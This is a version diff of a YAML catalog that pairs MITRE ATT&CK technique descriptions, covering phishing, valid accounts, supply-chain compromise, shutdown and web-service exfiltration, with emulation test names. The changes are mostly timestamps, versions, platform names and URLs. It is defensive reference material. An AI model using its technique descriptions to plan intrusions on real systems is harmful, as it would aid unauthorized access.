-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -65358,7 +66290,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests:
     - name: Restart System via `shutdown` - FreeBSD/macOS/Linux
@@ -65416,7 +66347,7 @@ impact:
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -65494,7 +66425,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -65544,11 +66474,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -65587,10 +66516,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -65607,7 +66536,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -65646,12 +66575,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -65713,7 +66641,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -65730,7 +66658,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -65760,7 +66687,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -65774,7 +66701,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -65837,12 +66763,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -65917,7 +66842,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -65931,19 +66856,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -65969,7 +66893,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -66024,7 +66948,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -66087,11 +67010,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -66106,6 +67028,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -66114,18 +67037,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -66157,9 +67080,6 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest Account on macOS
@@ -66175,7 +67095,7 @@ initial-access:
         elevation_required: true
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -66186,6 +67106,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -66194,22 +67119,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -66234,36 +67155,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -66292,9 +67196,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -66312,7 +67216,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -66350,11 +67258,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -66371,7 +67278,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -66381,7 +67287,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -66390,19 +67296,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -66450,11 +67354,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -66474,10 +67379,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -66510,7 +67413,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -66549,7 +67451,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -66564,7 +67466,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -66644,11 +67545,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -66704,11 +67604,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -66769,8 +67668,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -66798,13 +67697,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -66844,8 +67742,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -66853,13 +67753,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -66890,14 +67790,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -66964,11 +67861,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -67020,9 +67916,8 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges - MacOS
@@ -67086,7 +67981,7 @@ initial-access:
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -67110,10 +68005,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -67132,13 +68026,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -67177,9 +68070,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -67229,7 +68121,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
